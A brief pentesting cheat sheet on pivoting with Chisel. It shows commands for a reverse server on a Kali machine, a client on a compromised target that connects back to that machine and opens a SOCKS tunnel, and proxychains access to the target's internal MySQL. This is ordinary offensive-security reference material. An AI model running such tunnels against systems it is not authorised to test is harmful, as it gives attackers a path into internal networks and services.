Useful commands
Pivoting
# ON KALI
chisel server --port 8080 --reverse
# ON TARGET MACHINE
./chisel.exe client --max-retry-count 1 $kali:8080 R:socksMake sure that
/etc/proxychains4.confhas the following line at the bottom:
socks5 127.0.0.1 1080
access local services remotely through chisel tunnel
in this example, access a local mysql database through kali
# ON KALI
./chisel server --port 8000 --socks5 --reverse
# ON TARGET MACHINE WITH LOCAL SERVICE RUNNING YOU WANT TO ACCESS
./chisel client --max-retry-count 1 $kali:8000 R:socks
# ON KALI, TO ACCESS SERVICES
proxychains -q mysql -uroot -h 127.0.0.1
Useful flags
| Flag | Description |
|---|---|
| —reverse | SOCKS proxy port will be bound on the server. |
| —socks5 | Allow clients to access the internal SOCKS5 proxy. |
| —max-retry-count | Maximum number of times to retry before exiting. Defaults to unlimited. |
Info
Chisel uses a client/server model. A Chisel server must be set up, which can accept a connection from the Chisel client.